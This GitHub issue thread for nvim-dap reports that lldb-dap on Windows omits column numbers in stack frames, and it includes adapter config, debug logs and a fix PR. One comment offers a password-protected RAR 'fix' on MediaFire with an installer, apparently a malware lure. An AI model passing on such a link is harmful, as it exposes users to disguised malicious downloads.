### ISSUE TITLE
lldb-dap on windows does not report column number resulting in nil access when jumping to locations

### ISSUE THREAD

**Issue by GingerbreadFred** [mfussenegger/nvim-dap#1324]
### Debug adapter definition and debug configuration

Installed the adapter via the configuration from the wiki and running latest llvm lldb. 

```
      dap.adapters.lldb = {
        type = 'executable',
        command = 'lldb-dap',
        name = 'lldb',
      }
      dap.configurations.cpp = {
        {
          name = 'Launch',
          type = 'lldb',
          request = 'launch',
          program = function()
            return vim.fn.input('Path to executable: ', vim.fn.getcwd() .. '/', 'file')
          end,
          cwd = '${workspaceFolder}',
          stopOnEntry = false,
          args = {},
          runInTerminal = false,
        },
      }
```

### Debug adapter version

18.1.8

### Steps to Reproduce

In a c++ project on windows place a breakpoint and start debugging. 

### Expected Result

When the breakpoint is hit nvim navigates to the appropriate file and line

### Actual Result

On windows you get an error on dap/session.lua:376 due to column being nil. Attached logs from windows / mac doing the same thing. You can see the stackframe for mac contains the column where on windows it does not 

**Mac**

```
[ DEBUG ] 2024-08-26T18:51:19Z+0100 ] ...rich/.local/share/nvim/lazy/nvim-dap/lua/dap/session.lua:984 ]	1	{
  body = {
    stackFrames = { {
        column = 35,
        id = 524288,
        instructionPointerReference = "0x100012B38",
        line = 6,
        name = "ComponentParamsSetTest_AddRuntimeParam_AddsParamSorted_Test::TestBody()",
        source = {
          name = "ComponentParamsSetTest.cpp",
          path = "/Users/rich/Work/Swarm/SwarmCore/SwarmCoreTest/src/Game/ComponentParamsSetTest.cpp"
        }
      }, {
```

**Windows**

```
[ DEBUG ] 2024-08-26T19:01:31Z+0100 ] ...ppData/Local/nvim-data/lazy/nvim-dap/lua/dap/session.lua:986 ]	1	{
  body = {
    stackFrames = { {
        id = 524288,
        instructionPointerReference = "0x7FF789C6155D",
        line = 6,
        name = "private: virtual void __cdecl ComponentParamsSetTest_AddRuntimeParam_AddsParamSorted_Test::TestBody(void)",
        source = {
          name = "ComponentParamsSetTest.cpp",
          path = "C:\\Work\\Swarm\\SwarmCore\\SwarmCoreTest\\src\\Game\\ComponentParamsSetTest.cpp"
        }
      }, {

```
Full logs attached below. 

[dap-mac.log](https://github.com/user-attachments/files/16752216/dap-mac.log)
[dap-windows.log](https://github.com/user-attachments/files/16752217/dap-windows.log)

I have created a PR that fixes this locally for me but I don't know if this is the best way to fix it, I'm happy to explore alternatives 

[https://github.com/mfussenegger/nvim-dap/pull/1323](https://github.com/mfussenegger/nvim-dap/pull/1323)

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mfussenegger** [comment]
See https://github.com/mfussenegger/nvim-dap/pull/1323#issuecomment-2321527313
